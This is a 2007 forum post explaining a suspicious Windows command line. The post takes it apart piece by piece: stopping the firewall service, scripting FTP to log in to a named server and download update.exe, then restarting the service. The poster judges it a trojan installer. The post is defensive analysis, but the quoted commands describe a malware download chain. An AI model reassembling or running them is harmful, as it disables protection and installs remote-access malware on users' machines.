Thread: What in the hell is this? (Weird commands)
View Single Post
chucker
 
Join Date: May 2004
Location: near Bremen, Germany
Send a message via ICQ to chucker Send a message via AIM to chucker Send a message via MSN to chucker Send a message via Yahoo to chucker Send a message via Skype™ to chucker 
2007-04-12, 23:49
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
  quote